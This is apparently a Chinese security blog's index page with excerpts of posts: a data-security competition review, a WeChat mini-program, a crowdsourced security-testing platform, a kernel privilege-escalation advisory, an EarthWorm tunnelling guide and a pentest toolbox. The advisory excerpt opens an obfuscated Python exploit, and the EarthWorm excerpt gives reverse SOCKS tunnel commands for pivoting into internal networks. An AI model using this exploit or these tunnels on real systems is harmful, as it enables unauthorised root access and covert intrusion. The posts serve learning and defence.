江苏省第四届数据安全技术应用职业技能竞赛初赛复盘
这次打的是江苏省第四届数据安全技术应用职业技能竞赛初赛。题目整体很贴近真实数据安全场景:代码仓库泄露、门店音频隐私、AI 客服越权溯源、SQL 盲注日志还原,以及最后一组杂项数据泄露/脱敏/通话外泄题。 先说明一下边界:本文由比赛过程记录、赛后整理和赛后 AI 辅助补解共同合并而成。现场已经确认的部分会直接写结论;赛后继续分析出来的内容会明确标注;仍未完全做出的题不会伪装成现场解出。 题目一:源码泄露附件给了仓库服务器快照和泄露源码样本。核心思路是把 SSH 登录日志、授权公钥、Git bare 仓库和临时文件恢复结果串起来。 auth.log 中异常成功登录来自 10.18.8.73,日志给出 key_fp_prefix=SHA256:s1BnYrBJr15crI。对照 authorized_keys 中的四把公钥,并按 build_temp_bundle.py 暗示的 OpenSSH 指纹前缀规则计算后,可以定位到 ops-release-mirror 这把密钥。 泄露源码版本通过样本文件内容和服务器 bare 仓库对象匹配,定位到对应 commit: ...
糯糯便当屋:给情侣用的点菜小程序
糯糯便当屋是我做的一款微信小程序,最初是一个可爱的点菜系统,后来改造成更适合情侣日常使用的“小屋点菜”工具。 它的想法很简单:如果女朋友或男朋友今天想吃什么,可以像在外面点餐一样打开小程序,选择菜品、饮品或小吃,提交后生成一份模拟订单。做好之后再把订单标记完成,历史订单也会保留下来,方便以后回看。 想体验的话,可以直接在微信里搜索:糯糯便当屋。 适合什么场景 情侣之间日常点菜、点饮品、点小吃 想把“今天吃什么”变得更有仪式感 给两个人的小窝做一个专属菜单 记录做过的菜、完成过的订单 后续根据用户意见继续完善功能 主要功能 可爱的点菜首页,支持分类浏览菜品 菜品详情弹窗,可以选择规格、甜度、冰量等选项 餐篮结算,生成模拟订单 订单状态流转:待接单、制作中、已完成 小屋模块,支持用户提交意见和建议 后台管理,可以查看用户小屋、订单和反馈 界面展示点菜首页 菜品详情 餐篮结算 提交订单 订单已接收 制作中 已完成订单 订单列表 小屋页面 管理后台 后续计划后面会继续优化菜单管理、小屋数据统计、用户反馈处理和更多个性化设置。如果你也想让自己的小屋更有趣,可以先在微信里体验一下,再把想...
网络安全众测平台全栈开发
网络安全众测平台全栈开发最近把一个面向安全众测、攻防演练和漏洞审核场景的平台整理并开源了。 项目地址:https://github.com/benbenbendang/wangluoanquan-zhongce-pingtai 这个项目不是一个简单的“漏洞提交页面”,而是把从选手注册、授权资产查看、漏洞提交、风险申报、申诉处理,到管理员审核、评分、公告发布、模板下载、承诺书归档、积分排行和后台导出的一整套流程做成了线上系统。对我来说,这个项目最大的价值,不只是把页面和接口写出来,而是把真实业务流程完整跑通。 一、项目背景在众测和攻防演练场景里,最麻烦的往往不是“发现漏洞”本身,而是后续的流程管理。 如果还是靠 Excel、Word、微信群、邮件和人工汇总去处理选手提交的漏洞、风险和申诉,整个过程会非常割裂: 资产授权范围不好统一维护 漏洞附件和补充材料容易散落 审核进度、驳回原因、评分标准不透明 风险申报和漏洞审核之间缺少关联 管理员需要重复统计、重复导出、重复沟通 所以我做这个平台时,目标很明确:把“众测平台”真正做成一个完整的业务系统,而不是单点功能页面。 二、整体架...
CVE-2026-31431 Copy Fail:Linux 内核本地提权漏洞风险与缓解
CVE-2026-31431 Copy Fail:Linux 内核本地提权漏洞风险与缓解2026 年 4 月底,Linux 内核漏洞 CVE-2026-31431 公开披露,研究团队将其命名为 Copy Fail。该漏洞影响 Linux kernel 的 crypto/algif_aead 相关逻辑,攻击者在已经获得本地非特权用户执行权限的情况下,可能通过页面缓存写入链路完成本地提权,最终获得 root 权限。 需要先说明:该漏洞不是远程未授权 RCE,不能让互联网上的攻击者直接登录服务器;但它非常适合作为后渗透阶段的权限提升手段。一旦 Web 服务、CI 任务、容器、Notebook、在线判题、沙箱或普通用户账号被拿到执行权限,风险会明显放大。 exp测试 1234567891011#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","a...
EarthWorm (EW) 内网穿透工具使用指南
EarthWorm (EW) 使用指南EarthWorm 是一款高性能的轻量级内网穿透工具,支持正向/反向 SOCKS5 代理及多级转发。 1. 基础环境 核心程序:单个二进制文件(如 ew_for_Win.exe, ew_for_linux64 等)。 核心参数:通过 -s 参数指定链路模式。 2. 常用操作场景场景 A:正向 SOCKS5 代理适用情况:目标机有公网 IP,且防火墙允许外部连接其特定端口。 在目标机上开启监听: 123456789101112 ./ew -s ssocksd -l 88881. **攻击机操作**:直接设置浏览器或代理工具(Proxifier)连接 `目标机IP:8888` 即可。### 场景 B:反向 SOCKS5 代理(最常用)**适用情况**:目标机在内网,无法从外部访问,但它可以主动连接外网。1. **在公网 VPS 上监听(转接隧道):** 将 1080 端口收到的代理请求转发给反连 8888 端口的机器./ew -s rcsocks -l 1080 -e 8888 123452. **在内网目标...
BenD渗透测试工具箱
注:本工具箱基于One-Fox工具箱改编而来,采用他的ui和管理方法,如若侵权可联系我删除 二次开发作者 Bendan 网址:www.nbphp.cn 项目地址:链接:https://pan.quark.cn/s/dc3817eaca73 提取码:fd21 BenD 渗透测试工具箱使用方法直接双击BenD渗透测试工具箱.vbs即可启动 BenD 渗透测试工具箱展示截图 BenD 渗透测试工具箱一个基于 PyQt6 的本地渗透测试工具集启动器与管理器,聚合常用的信息收集、漏洞扫描、后渗透、免杀、抓包代理、WebShell 管理及网页工具,支持分类管理、模糊搜索、快捷键与主题配置,开箱即用。 功能概览 图形化工具管理:按分类展示,支持添加/编辑/删除工具 统一启动方式:支持 GUI、命令行、Python、批处理、PowerShell、Java 8/11、网页 模糊搜索与权重排序:快速定位常用工具 快捷键绑定:为任意工具设置全局热键,一键启动 个性化设置:主题切换、背景图、退出行为、Python/Java 路径 托盘管理与单实例保护:避免重复启...





